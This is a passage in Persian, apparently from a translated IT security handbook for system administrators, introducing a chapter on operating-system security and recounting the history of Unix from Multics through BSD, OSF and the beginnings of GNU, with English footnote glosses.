‫ﺍﻓﺮﺍﺩﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﻛﺎﺭ ﺑﺎ ﺳﻴﺴﺘﻢ ﻭ ﺭﺍﻫﺒﺮﻱ ﺁﻥ ﺩﺍﺭﻧﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑـﺴﻴﺎﺭ ﻋﻼﻗـﻪﻣﻨـﺪ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻨﺪ(‪ .‬ﺑـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ‬
‫ﻋﻼﻗﻪﻣﻨﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﻛﻪ ﺑﻪ ﻣﺂﺧﺬ ﺍﺭﺯﺷﻤﻨﺪ ﻓﺮﺍﻭﺍﻧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻧﻈﺮ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺑﻪ ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍﻳﺎﻧﻪ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺨﺶ ‪ ۵‬ﺷﺎﻣﻞ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻋﻤﺪﻩ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﮔﺮﭼﻪ ﻗﺴﻤﺖ ﻋﻤﺪﺓ ﺑﺨﺶ ‪ ۵‬ﺗﺎ‬
‫ﺟﺎﻳﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻏﻴﺮ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﺭﺟﺎﻉﻫﺎﻳﻲ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪،Unix ،Microsoft Windows‬‬
‫‪ ،Mac OS X ،Linux‬ﻭ ﺳﺎﻳﺮ ﮔﻮﻧﻪﻫﺎﻱ ‪ Unix‬ﺭﻭﻣﻴﺰﻱ‪ ٣‬ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﺗﻮﺻﻴﻪﻫـﺎﻱ ﺭﻭﺷـﻨﻲ ﺩﺭﺑـﺎﺭﻩ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ‬
‫ﻣﻲﺗﻮﺍﻥ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﻪﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻥ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫‪Unix‬‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ Unix‬ﻭ ﺷﺒﻪ ‪ Unix‬ﻣﺘﻨﻮﻋﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ )ﻛﻪ ﮔﺎﻩ ﻛﺎﻣ ﹰﻼ ﺑﺎ ﻫﻢ ﻣﺘﻔﺎﻭﺗﻨـﺪ( ﻭ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺘﻔﺎﻭﺗﻲ ﺗﻮﺯﻳـﻊ ﻣـﻲﺷـﻮﻧﺪ‪.‬‬
‫ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺁﻥ ﻣﺴﺘﻠﺰﻡ ﻳﻚ ﻣﺮﻭﺭ ﻣﺨﺘﺼﺮ ﺗﺎﺭﻳﺨﻲ ﺍﺳﺖ‪.‬‬
‫ﺭﻳﺸﻪﻫﺎﻱ ‪ Unix‬ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ ﺑﻪ ﻃﺮﺡ ‪ Multics‬ﺩﺭ ﺍﻭﺍﺳﻂ ﺳـﺎﻟﻬﺎﻱ ‪ .۱۹۶۰‬ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﻛـﻪ ﺑﻮﺳـﻴﻠﻪ ﺳـﺎﺯﻣﺎﻥ ﻃﺮﺣﻬـﺎﻱ ﺗﺤﻘﻴﻘـﺎﺗﻲ‬
‫ﭘﻴﺸﺮﻓﺘﻪ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻟﺖ ﻣﺘﺤﺪﻩ )‪ DARPA‬ﻳﺎ ‪ (ARPA‬ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪ ﺑﺮﺍﻱ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﻜﭙﺎﺭﭼﻪ ﻣﺘﺸﻜﻞ‬
‫ﺍﺯ ﺑﺎﻧﻜﻬﺎﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺣﺎﻭﻱ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ‪ ،‬ﺣﺎﻓﻈﻪ‪ ،‬ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻮﺩﻧﺪ‪ .‬ﺑﺮﺍﺳـﺎﺱ ﺍﻳـﻦ ﻃﺮﺍﺣـﻲ‪ ،‬ﺑﺨـﺸﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﺭﻭﻱ ﺩﻳﮕﺮ ﻗﺴﻤﺘﻬﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺄﺛﻴﺮ ﺑﮕﺬﺍﺭﺩ‪ ،‬ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮﺍﺕ ﺧﺎﻣﻮﺵ ﺷﻮﺩ‪ .‬ﮔﺮﭼﻪ ﺍﻣﺮﻭﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻴﺴﺮ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ‪ Multics‬ﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ‪ Multics .‬ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻛـﻪ ﻫـﻢ ﺩﺭ ﺑﺮﺍﺑـﺮ‬
‫ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧﻲ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻭ ﻫﻢ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺧﻠﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺣﻔﺎﻇﺖ ﻛﻨـﺪ‪ Multics .‬ﺑـﺎ ﻫـﺪﻑ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ‬
‫ﭼﻨﺪﺳﻄﺤﻲ‪ ٤‬ﻃﺮﺍﺣﻲ ﺷﺪ‪ Multics .‬ﺑﺎﻻﺧﺮﻩ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺧﺪﻣﺎﺕ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﺮﺩ ﻛﻪ ﻫﻨﻮﺯ ﻫﻢ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺑﻪ ﺁﻥ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ‪.‬‬
‫ﺩﺭﺣﺎﻟﻴﻜﻪ ‪ Multics‬ﺳﻌﻲ ﺩﺍﺷﺖ ﻛﺎﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ Unix ،‬ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﻳﻚ ﻛﺎﺭ ﺭﺍ ﺧﻮﺏ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ‪ :‬ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎ‪.‬‬
‫"ﺍﻣﻨﻴﺖ ﻗﻮﻱ" ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﻫﺪﻑ ﻧﺒﻮﺩ‪ .‬ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺮﺍﺳﺎﺱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﺸﺮﺩﻩﺳﺎﺯﻱﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎ‪ ٥‬ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛـﻪ ﻫﺮﻛـﺪﺍﻡ‬
‫ﻋﻤﻠﻴﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻧـﺪ‪ .‬ﺷـﺮﻛﺖ ﺗﻠﻔـﻦ ﻭ ﺗﻠﮕـﺮﺍﻑ ﺁﻣﺮﻳﻜـﺎ )‪ ٦(AT&T‬ﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ﺩﻫـﺔ ‪ ۱۹۷۰‬ﺍﺑﺰﺍﺭﻫـﺎ ﻭ‬
‫ﻭﻳﮋﮔﻴﻬﺎﺋﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻛﺮﺩ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۱۹۷۳‬ﺗﺎﻣﺴﻮﻥ‪ ٧‬ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ Unix‬ﺭﺍ ﺑﻪ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ‪ C‬ﻛﻪ ﺭﻳﭽﻲ‪ ٨‬ﺑﻪ ﺗـﺎﺯﮔﻲ ﺁﻧـﺮﺍ‬
‫ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺑﻮﺩ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﺮﺩ‪ .‬ﺯﺑﺎﻥ ‪ C‬ﻃﻮﺭﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﺳﺎﺩﻩ ﻭ ﺟﺎﺑﺠﺎﻳﻲﭘـﺬﻳﺮ ﺑﺎﺷـﺪ‪ .‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻪ ﺯﺑﺎﻥ ‪ C‬ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻳﻚ ﻧـﻮﻉ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ ﻧـﻮﻉ ﺩﻳﮕـﺮ ﻣﻨﺘﻘـﻞ ﺷـﻮﻧﺪ‪ ،‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺯﺑﺎﻧﻬـﺎﻱ‬
‫‪Logs‬‬
‫‪Desktop Unix‬‬
‫‪Multilevel Security‬‬
‫‪Tools‬‬
‫‪American Telephone & Telegraph‬‬
‫‪Thompson‬‬
‫‪Ritchie‬‬
‫‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫‪5‬‬
‫‪6‬‬
‫‪7‬‬
‫‪8‬‬
‫‪٢٥٩‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺳﻄﺢ ﺑﺎﻻ ﻣﺜﻞ ‪ Fortran‬ﺍﻧﺠﺎﻡﭘﺬﻳﺮ ﺑﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎ ﺳﺮﻋﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺯﺑﺎﻥ ﺑـﻮﻣﻲ‬
‫ﻣﺎﺷﻴﻦ ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ‪ .‬ﺗﺎ ﺳﺎﻝ ‪ ۱۹۷۷‬ﺑﻴﺶ ﺍﺯ ‪ ۵۰۰‬ﺍﺩﺍﺭﻩ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ؛ ‪ ۱۲۵‬ﺍﺩﺍﺭﻩ ﻋﺒﺎﺭﺕ‬
‫ﺑﻮﺩﻧﺪ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﻴﺶ ﺍﺯ ‪ ۱۰‬ﻛﺸﻮﺭ ﺧﺎﺭﺟﻲ ﺩﻳﮕﺮ‪.‬‬
‫ﺗﻮﺳﻌﻪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻔﻲ ﺍﺩﺍﻣﻪ ﻳﺎﻓﺖ؛ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﺩﺭ ﺑﺮﻛﻠﻲ‪ ،‬ﻛـﻪ ﮔـﺴﺘﺮﺵ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺑﺮﻛﻠـﻲ )‪ - ٩(BSD‬ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺳﻴﺴﺘﻢ ‪ - Unix‬ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ‪ .‬ﺩﺭ ‪ ۶‬ﺳﺎﻝ ﺑﻌﺪﻱ‪ ،‬ﺩﺭ ﻓﻌﺎﻟﻴﺘﻲ ﻛﻪ ﺗﻮﺳﻂ ‪ ARPA‬ﺭﻭﻱ ﺁﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺷـﺪ‪،‬‬
‫ﺁﻧﭽﻪ ﺗﺎ ﺁﻧﺰﻣﺎﻥ ‪ BSD Unix‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﺪ ﺗﺎ ﺣﺪ ﻭ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺴﺘﻘﻞ ﺭﺷﺪ ﻛﺮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺻﻼﺣﺎﺕ ﭼـﺸﻤﮕﻴﺮﻱ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ AT&T‬ﺷﺪ‪ .‬ﺷﺎﻳﺪ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺻﻼﺣﺎﺕ ﺑﺮﻛﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺷﺒﻜﻪ ﺑﻮﺩ‪ ،‬ﻛﻪ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ‪ Unix‬ﺭﺍ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ‬
‫)‪LAN‬ﻫﺎ(‪ ١٠‬ﺁﺳﺎﻥ ﻣﻲﻛﺮﺩ‪ .‬ﺑﻪ ﻫﻤﻪ ﺍﻳﻦ ﺩﻻﻳﻞ‪ Unix ،‬ﻧﺴﺨﺔ ﺑﺮﻛﻠﻲ ﺩﺭ ﺟﻮﺍﻣ ﹺﻊ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻋﻠﻤﻲ ﺭﻭﺍﺝ ﺑﺴﻴﺎﺭ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﺍﻭﺍﺧﺮ ﺳﺎﻟﻬﺎﻱ ‪ ۱۹۸۰‬ﺯﻣﺎﻧﻴﻜﻪ ‪ Unix‬ﺍﺯ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﻲ ﺑـﻪ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺭﺍﻩ ﭘﻴـﺪﺍ ﻛـﺮﺩ‪ ،‬ﻧﺎﺳـﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﻣﻴـﺎﻥ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ AT&T Unix‬ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ BSD Unix‬ﺷﺮﻭﻉ ﺑﻪ ﺍﻳﺠﺎﺩ ﻣﺸﻜﻼﺕ ﺑﺮﺍﻱ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﻤﻮﺩ‪ .‬ﻣﺸﺘﺮﻳﺎﻥ‬
‫ﺗﺠﺎﺭﻱ ﺧﻮﺍﻫﺎﻥ ﻳﻚ ﻧﺴﺨﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ Unix‬ﺑﻮﺩﻧﺪ‪ ،‬ﺑﻪ ﺍﻳﻦ ﺍﻣﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻣـﻮﺯﺵ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫﻨـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺎﺧﺘﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑـﺎﺯﺍﺭ ﻧﻮﻇﻬـﻮﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫ﻲ ﺑﺴﺘﺮﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺭﺍ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺳﺎﺩﻩﺗـﺮ ﻣـﻲﻛﻨـﺪ ﻭ‬
‫‪ Unix‬ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻲﻃﻠﺒﻴﺪ‪ ،‬ﭼﻮﻥ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﺎﻭﺭ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﭘﺸﺘﻴﺒﺎﻧ ﹺ‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺑﺎﺯﺍﺭ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﻗﺎﺑﺖ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺩﺭ ﻣﺎﻩ ﻣﻲ ‪ ،۱۹۸۸‬ﻫﻔﺖ ﺷﺮﻛﺖ ﭘﻴﺸﺮﻭ ﺩﺭ ﺻﻨﻌﺖ ‪ - Unix‬ﺭﺍﻳﺎﻧﻪ ﺁﭘﻮﻟﻮ‪ ،١١‬ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ،١٢‬ﻫﻴﻮﻟﺖ ﭘﺎﻛﺎﺭﺩ )‪،IBM ،١٣(HP‬‬
‫‪١٤‬‬
‫ﻭ ﺳﻪ ﺷﺮﻛﺖ ﺍﺻﻠﻲ ﺍﺭﻭﭘﺎﻳﻲ ﺳﺎﺯﻧﺪﻩ ﻛﺎﻣﭙﻴﻮﺗﺮ ‪ -‬ﺗﺸﻜﻴﻞ ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯ )‪ (OSF‬ﺭﺍ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ‪ .‬ﻫﺪﻑ ‪ OSF‬ﺑﻴـﺮﻭﻥ ﺁﻭﺭﺩﻥ ‪Unix‬‬
‫ﺍﺯ ﻛﻨﺘﺮﻝ ‪ AT&T‬ﻭ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ ﺩﺳﺘﺎﻥ ﻳﻚ ﺍﺋﺘﻼﻑ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺻﻨﻌﺘﻲ ﺑﻮﺩ‪ ،‬ﻛﻪ ﺑﺎ ﻫﺪﺍﻳﺖ ﺗﻮﺳﻌﺔ ‪ Unix‬ﺩﺭ ﺁﻳﻨـﺪﻩ ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ‪ -‬ﺗﺤﺖ ﻳﻚ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺍﺣـﺪ ‪ -‬ﺭﻫﺒـﺮﻱ ﻣـﻲﺷـﺪ‪ OSF .‬ﺗـﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﺎﻳـﺔ ‪ Unix‬ﺧـﻮﺩ ﺭﺍ ﺑﺮﺍﺳـﺎﺱ‬
‫‪١٦‬‬
‫‪١٥‬‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ‪ IBM‬ﻗﺮﺍﺭ ﺩﻫﺪ‪ ،‬ﭘﺲ ﺑﻪ ﺳﻤﺖ ﻫﺴﺘﺔ ‪ Unix‬ﻣﺎﺥ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﺭﻧﻲ ﻣﻠﻮﻥ ‪ ،‬ﻛﻪ ﺁﻣﻴﺰﻩﺍﻱ ﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﻭ ﺗﺴﻬﻴﻼﺕ ‪HP‬‬
‫ﻭ ‪ IBM‬ﻭ ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺩ ﺣﺮﻛﺖ ﻛﺮﺩ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻮﺭﺩ ﭘﺬﻳﺮﺵ ﻭ ﺍﺳﺘﻘﺒﺎﻝ ﮔﺴﺘﺮﺩﻩ ﻭﺍﻗـﻊ ﻧـﺸﺪ‪،‬‬
‫‪ OSF‬ﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﻴﺸﺘﺮ ﺗﻮﺳﻌﻪﺍﻱ ﺍﺩﺍﻣﻪ ﺩﺍﺩ‪.‬‬
‫‪GNU‬‬
‫‪Berkeley Software Distribution‬‬
‫‪Local Area Networks‬‬
‫‪Apollo Computer‬‬
‫‪Digital Equipment Corporation‬‬
‫‪Hewlett Packard‬‬
‫‪Open Software Foundation‬‬
‫‪Mach‬‬
‫‪Carnegie Mellon University‬‬
‫‪Richard Stallman‬‬
‫‪GNU's Not Unix‬‬
‫‪9‬‬
‫‪10‬‬
‫‪11‬‬
‫‪12‬‬
‫‪13‬‬
‫‪14‬‬
‫‪15‬‬
‫‪16‬‬
‫‪17‬‬
‫‪18‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺭﻳﭽﺎﺭﺩ ﺍﺳﺘﺎﻟﻤﻦ‪ ١٧‬ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﭘﺮﻭﮊﻩ ‪ LISP‬ﺩﺭ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﻫﻮﺵ ﻣﺼﻨﻮﻋﻲ ﺩﺍﻧﺸﮕﺎﻩ ﻭﻗﺘـﻲ ﺩﻳـﺪ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺭﺳﺎﻧﺪﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺄﺳﻴﺲ ﺷﺪﻩﺑﻮﺩﻧﺪ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﭘﺬﻳﺮﻓﺘﻨﺪ ﻛﻪ ﻣﺎﻧﻊ ﺑﻪ ﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻮﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺭﺍﺣـﺖ ﺷـﺪ‪ .‬ﺍﺳـﺘﺎﻟﻤﻦ‬
‫ﻣﺘﻮﺟﻪ ﺷﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨﻮﺍﻫﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﻣﻴﺎﻥ ﮔﺮﻭﻩ ﺑﺰﺭﮔﻲ ﺍﺯ ﻣﺮﺩﻡ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﺩ‪ ،‬ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺳـﺎﺱ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮ ﺳـﺨﺖﺍﻓـﺰﺍﺭ‬
‫ﺧﺎﺻﻲ ﻛﻪ ﺗﻨﻬﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺧﺎﻧﻪﻫﺎﻱ ﺳﺎﺯﻧﺪﻩ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻭ ﺗﻨﻬﺎ ‪ LIPS‬ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﭘﺎﻳﻪﮔـﺬﺍﺭﻱ ﻛﻨـﺪ‪ .‬ﻟـﺬﺍ ﺑـﻪ‬
